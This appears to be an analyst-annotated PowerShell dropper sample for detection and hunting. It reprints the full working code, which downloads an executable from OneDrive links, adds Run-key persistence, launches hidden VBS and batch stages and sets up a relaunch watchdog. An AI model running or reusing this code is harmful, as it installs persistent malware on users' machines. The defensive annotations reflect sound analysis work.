# Analyst annotations for a PowerShell dropper sample (this is PowerShell, not POSIX shell).
# The comments describe only what the statements below do, so the sample can be
# triaged and hunted for. Every artifact is written under C:\Users\Public, which
# standard users can write to by default and which needs no elevation.
# Stages, in order:
#   1. fetch Untitled.exe and Untitled.exe.manifest from OneDrive download links
#   2. write 1.bat (HKCU Run-key persistence) and 1.vbs (hidden launcher), then run 1.vbs
#   3. write look.ps1 (a 30-second relaunch watchdog) and run it in a hidden PowerShell
# Artifacts to hunt for: C:\Users\Public\{Untitled.exe, Untitled.exe.manifest,
# 1.bat, 1.vbs, look.ps1}, the HKCU Run values "1" and "2", and the two URLs below.

# Stage 1a: download the payload executable with System.Net.WebClient.
# The script checks no hash or signature before the file is persisted and launched.
# Detection: an outbound connection from powershell.exe to onedrive.live.com
# (Sysmon Event ID 3) followed by an .exe created under C:\Users\Public (Event ID 11).
$download_url = "https://onedrive.live.com/Download?cid=358166AEFCA69E90&resid=358166AEFCA69E90%21140&authkey=AD54_li6xAtRpc8"
$local_path = "C:\Users\Public\Untitled.exe"
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($download_url, $local_path)



# Stage 1b: download a second file and save it next to the payload as
# "Untitled.exe.manifest". It comes from the same OneDrive cid with a different resid/authkey.
# NOTE(review): presumably an application manifest read when Untitled.exe loads;
# its content is not visible here, so collect the file and confirm.
$download_url = "https://onedrive.live.com/Download?cid=358166AEFCA69E90&resid=358166AEFCA69E90%21139&authkey=AOITnE4lBM7QpdQ"
$local_path = "C:\Users\Public\Untitled.exe.manifest"
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($download_url, $local_path)

# Stage 2a: build 1.bat. It adds two values to the per-user Run key, which needs no
# admin rights (MITRE ATT&CK T1547.001):
#   value "1" -> C:\Users\Public\Untitled.exe
#   value "2" -> cmd.exe /c powershell ... -file C:\Users\Public\look.ps1
# Value 2 uses abbreviated switches ("-windo 1" = -WindowStyle Hidden, "-exec bypass" =
# -ExecutionPolicy Bypass). Detections should therefore match parameter prefixes, not
# only the full names.
# NOTE(review): the quoting inside value 2 is irregular. Match on substrings of the
# stored data rather than expecting a cleanly parsed command line.
# Detection: Sysmon Event ID 13 (registry value set) on
# HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, and reg.exe spawned from cmd.exe.
$Content = @'

REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 1 /d "C:\Users\Public\Untitled.exe"
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 2 /d "C:\Windows\System32\cmd.exe '/c  powershell -windo 1 -noexit -exec bypass -file C:\Users\Public\look.ps1"

'@
Set-Content -Path C:\Users\Public\1.bat -Value $Content
# Stage 2b: build 1.vbs. It runs 1.bat through WScript.Shell.Run with window style 0
# (hidden) and bWaitOnReturn = true, so the batch file's console is never shown.
$Content = @'
set WshShell = wscript.createobject("WScript.shell")
WshShell.run """C:\Users\Public\1.bat"" ", 0, true
Set WshShell = Nothing

'@
Set-Content -Path C:\Users\Public\1.vbs -Value $Content

# "start" is the Start-Process alias. It opens 1.vbs with whatever handler is
# registered for .vbs (normally wscript.exe; confirm on the affected host).
# Expected process chain: powershell.exe -> wscript.exe -> cmd.exe -> reg.exe.
start C:\Users\Public\1.vbs

# Stage 3a: build look.ps1, an endless watchdog loop. Every 30 seconds it looks for a
# process named "Untitled" and starts C:\Users\Public\Untitled.exe when none is found.
# NOTE(review): the empty inner braces in the loop appear to do no useful work.
# Response implication: killing Untitled.exe alone is not enough. Stop the hidden
# powershell.exe that runs look.ps1 first, then remove the Run values and the dropped files.
$Content = @'

while ($true){
if((get-process "Untitled" -ea SilentlyContinue) -eq $Null){
{

}

start C:\Users\Public\Untitled.exe

}
start-sleep 30
}


'@
Set-Content -Path C:\Users\Public\look.ps1 -Value $Content


# Stage 3b: run the watchdog now, in a child PowerShell with a hidden window, no profile,
# and ExecutionPolicy Unrestricted. look.ps1 never exits, so this call does not return.
# Detection: process-creation logs (Security 4688 / Sysmon Event ID 1) for powershell.exe
# with "-WindowStyle hidden" and an -ExecutionPolicy override that point at a script under
# C:\Users\Public. PowerShell script-block logging (Event ID 4104) records the loop body.
# Mitigation: application control (AppLocker / WDAC) rules that deny executables and
# scripts from running under C:\Users\Public.
powershell -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "C:\Users\Public\look.ps1"







